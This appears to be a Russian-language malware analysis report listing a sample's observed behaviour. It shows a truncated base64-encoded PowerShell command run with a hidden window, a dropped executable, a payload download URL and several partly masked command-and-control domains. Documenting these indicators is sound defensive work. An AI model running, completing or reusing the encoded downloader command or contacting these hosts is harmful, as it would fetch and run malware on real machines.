Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABuAG8AegBtAG8AdQBzAHoAbwB4AD0AJwBsAHUAYQBxAHUAJwA7AFsATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6ACIAcwBFAGAAQwBgAFUAUgBpAHQAeQBQAHIAYABvAGAAVABvAGMAbwBMACIAIAA9AC...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1504
- %TEMP%\642739.cvr
- %HOMEPATH%\412.exe
- %HOMEPATH%\412.exe
- 'di####lsanyog.com':443
- 'jo#.##hooljano.com':80
- http://jo#.##hooljano.com/assets/cV3536/
- DNS ASK we#####sbeautyhub.com
- DNS ASK ro##ons.com
- DNS ASK di####lsanyog.com
- DNS ASK jo#.##hooljano.com
- DNS ASK de##.##sntmoodle.site
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABuAG8AegBtAG8AdQBzAHoAbwB4AD0AJwBsAHUAYQBxAHUAJwA7AFsATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6ACIAcwBFAGAAQwBgAFUAUgBpAHQAeQBQAHIAYABvAGAAVABvAGMAbwBMACIAIAA9AC... (со скрытым окном)